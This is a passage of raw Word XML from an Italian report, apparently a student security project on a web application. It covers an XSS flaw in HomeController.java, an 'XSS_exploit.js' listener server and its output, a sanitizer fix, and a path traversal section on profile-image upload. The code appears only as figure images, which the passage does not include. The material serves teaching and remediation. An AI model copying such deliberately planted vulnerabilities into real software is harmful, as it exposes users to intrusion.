        <w:t xml:space="preserve"> usando un sanitizer di OW</w:t>
      </w:r>
      <w:r w:rsidR="002F292A">
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t>P che sanitizza il nome per evitare gli attacchi</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> (Figura 33)</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t>. Lato frontend invece è stato introdotto un controllo sui caratteri non consentiti per maggiore sicurezza</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> (Figura 32)</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA621A" w14:textId="665648A3" w:rsidR="00D12C9A" w:rsidRDefault="00C53E14" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03AC24EC" wp14:editId="172D80AA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5965825" cy="21062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5825" cy="2106295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4ADCE" w14:textId="3C3B967D" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3E74D5" w14:textId="77777777" w:rsidR="009015E9" w:rsidRPr="00D12C9A" w:rsidRDefault="009015E9" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEAB21B" w14:textId="70BE1B71" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="59640B92" w14:textId="66AD3083" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="61C2BF80" w14:textId="550910A0" w:rsidR="004B30FC" w:rsidRDefault="00C53E14" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251810816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28DE12CD" wp14:editId="57CFB472">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>895350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5965825" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1663874158" name="Casella di testo 1"/>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25E7ACFF" w14:textId="0EEE0DC7" w:rsidR="009015E9" w:rsidRPr="00436745" w:rsidRDefault="009015E9"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28</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">: HomeController.java </w:t>
                            </w:r>
                            <w:r w:rsidR="00C53E14">
                              <w:t>con metodo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E12CD" id="_x0000_s1055" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:70.5pt;width:469.7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xl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u53PbqY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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="25E7ACFF" w14:textId="0EEE0DC7" w:rsidR="009015E9" w:rsidRPr="00436745" w:rsidRDefault="009015E9"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28</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">: HomeController.java </w:t>
                      </w:r>
                      <w:r w:rsidR="00C53E14">
                        <w:t>con metodo vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A96554" w14:textId="412151B8" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="79280D25" w14:textId="2AF6BFF4" w:rsidR="004B30FC" w:rsidRDefault="00C53E14" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251812864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="572EB3A1" wp14:editId="28544EE4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>497840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3093085</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5117465" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2136155551" name="Casella di testo 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666596B2" w14:textId="0D2753CB" w:rsidR="00C53E14" w:rsidRPr="005D0ED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29</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Navba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EB3A1" id="_x0000_s1056" type="#_x0000_t202" style="position:absolute;margin-left:39.2pt;margin-top:243.55pt;width:402.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3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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="666596B2" w14:textId="0D2753CB" w:rsidR="00C53E14" w:rsidRPr="005D0ED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29</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Navbar.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009015E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B681271" wp14:editId="16730070">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-614045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5117465" cy="3649980"/>
            <wp:effectExtent l="0" t="0" r="698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0131"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="51174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64F36" w14:textId="673A1F8E" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="39104C62" w14:textId="39FCB78E" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1265285C" w14:textId="3F06F521" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="58D61F9B" w14:textId="7E7E38BF" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49AE0CE3" w14:textId="3F3ABC6F" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3EC43AEB" w14:textId="460F8F1A" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0BCF1677" w14:textId="1259F3F6" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0F42EB12" w14:textId="7DEC730C" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6ED912E2" w14:textId="2C09FEAE" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7EC7A80E" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="26E96782" w14:textId="47FEC597" w:rsidR="00D12C9A" w:rsidRDefault="00C53E14" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251814912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13EF03FB" wp14:editId="68BAD202">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>935990</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2393315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4244340" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1172244849" name="Casella di testo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5A0C3E83" w14:textId="5A9389A0" w:rsidR="00C53E14" w:rsidRPr="00560365"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0</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Server in ascolto nel file XSS_exploi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03FB" id="_x0000_s1057" type="#_x0000_t202" style="position:absolute;margin-left:73.7pt;margin-top:188.45pt;width:334.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Up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Op/P5hSSFLubfYw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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5A0C3E83" w14:textId="5A9389A0" w:rsidR="00C53E14" w:rsidRPr="00560365"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0</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Server in ascolto nel file XSS_exploit.js</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00370316">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60FDEBE2" wp14:editId="2E705CDC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4244340" cy="2326005"/>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2326005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15537094" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0FC781C1" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15080FA8" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="423289BD" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15418F3E" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="00B5A4C2" w14:textId="77777777" w:rsidR="00C53E14" w:rsidRDefault="00C53E14" w:rsidP="00467BBC"/>
    <w:p w14:paraId="01DAEFDC" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2B035A01" w14:textId="37C0BF2F" w:rsidR="00E16865" w:rsidRDefault="00C53E14" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251816960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78734630" wp14:editId="10771B04">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-587375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>760730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7295515" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="954290696" name="Casella di testo 1"/>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wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7C359B5E" w14:textId="14972B99"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1</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Output del server in asco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4630" id="_x0000_s1058" type="#_x0000_t202" style="position:absolute;margin-left:-46.25pt;margin-top:59.9pt;width:574.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5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p3ez2WT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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7C359B5E" w14:textId="14972B99" w:rsidR="00C53E14" w:rsidRPr="00C75042"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1</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Output del server in ascolto</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00072AFB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1984CFCF" wp14:editId="477B9FC8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33528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32B4AD84" w14:textId="1BED2D72" w:rsidR="002F292A" w:rsidRDefault="002F292A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0E112378" w14:textId="77777777" w:rsidR="00370316" w:rsidRDefault="00370316" w:rsidP="00467BBC"/>
    <w:p w14:paraId="01346EED" w14:textId="4BFCBFEC" w:rsidR="009015E9" w:rsidRDefault="00C53E14" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251819008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A5BA79D" wp14:editId="05810812">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>821690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1755140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4469130" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1758972627" name="Casella di testo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4337FDA0" w14:textId="600D16C4"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2</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: CreateOff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A79D" id="_x0000_s1059" type="#_x0000_t202" style="position:absolute;margin-left:64.7pt;margin-top:138.2pt;width:351.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GeGwIAAEA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2d3kymFJMVm04+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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4337FDA0" w14:textId="600D16C4" w:rsidR="00C53E14" w:rsidRPr="0098031A"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2</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: CreateOffer.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16009D86" wp14:editId="61425704">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>215265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4469130" cy="1483074"/>
            <wp:effectExtent l="0" t="0" r="762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130" cy="1483074"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDDD5D3" w14:textId="77777777" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0AE8B8F6" w14:textId="4D1E098A" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="310CC990" w14:textId="31FB1C04" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7A01B73F" w14:textId="0107B475" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5ED2E724" w14:textId="00DFB54A" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="268E94E6" w14:textId="1A95229F" w:rsidR="00926F16" w:rsidRDefault="00C53E14" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251821056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="665DECA0" wp14:editId="66389C95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-229235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2181860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6579235" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="267670965" name="Casella di testo 1"/>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2FC09399" w14:textId="61F7FE26"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3</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Home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ECA0" id="_x0000_s1060" type="#_x0000_t202" style="position:absolute;margin-left:-18.05pt;margin-top:171.8pt;width:518.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4F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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2FC09399" w14:textId="61F7FE26" w:rsidR="00C53E14" w:rsidRPr="00EF4DC1" w:rsidRDefault="00C53E14" w:rsidP="00C53E14">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>33</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HomeController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00EE2C14" wp14:editId="2C75D3CA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-436880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6579616" cy="256210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616" cy="2562108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B40A71" w14:textId="1534F7CE" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="664B7DAB" w14:textId="59B4B1B6" w:rsidR="00926F16" w:rsidRDefault="00926F16" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7EA0A956" w14:textId="135D0B27" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="06BD5273" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="248BA531" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="54B87073" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2343ED60" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="19199977" w14:textId="02168D3E" w:rsidR="00D12C9A" w:rsidRPr="00C53E14" w:rsidRDefault="00EB78A7" w:rsidP="00C53E14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17321F5A" w14:textId="4C2E8E9B" w:rsidR="001A57CF" w:rsidRDefault="00C53E14" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB8072" w14:textId="67F3BCB1" w:rsidR="00C53E14" w:rsidRDefault="00C53E14" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0026401D">
        <w:t xml:space="preserve"> 135</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77B381" w14:textId="77777777" w:rsidR="00C53E14" w:rsidRDefault="00C53E14"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50403A85" w14:textId="24488602" w:rsidR="0026401D" w:rsidRPr="0026401D" w:rsidRDefault="0026401D" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo caso, è stata aggiunta un’immagine del profilo dell’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che è possibile inserire al momento della registrazione di un utente. Per fare ciò è stato modificata l’API </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/signup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e sono stati aggiunti nello stesso file i metodi </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">getImage() </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidRPr="0026401D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saveProfileImage()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Figura </w:t>
      </w:r>
      <w:r w:rsidR="000E1CCE">
        <w:t>36 e 37</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Lato frontend il file Signup.jsx gestisce l’aggiunta dell’immagine del profilo come in Figura </w:t>
      </w:r>
      <w:r w:rsidR="000E1CCE">
        <w:t xml:space="preserve">35 </w:t>
      </w:r>
      <w:r>
        <w:t>ed AccountUser.jsx si occupa di mostrarla, recuperandola dal backend</w:t>
      </w:r>
      <w:r w:rsidR="000E1CCE">
        <w:t xml:space="preserve"> (Figura 34).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7990D5" w14:textId="5054118E" w:rsidR="0026401D" w:rsidRDefault="0026401D" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D73604" w14:textId="106C194F" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AFD034" w14:textId="324E6367" w:rsidR="0076032B" w:rsidRDefault="0076032B" w:rsidP="002F292A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251825152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04483386" wp14:editId="239C4DDA">
                <wp:simplePos x="0" y="0"/>
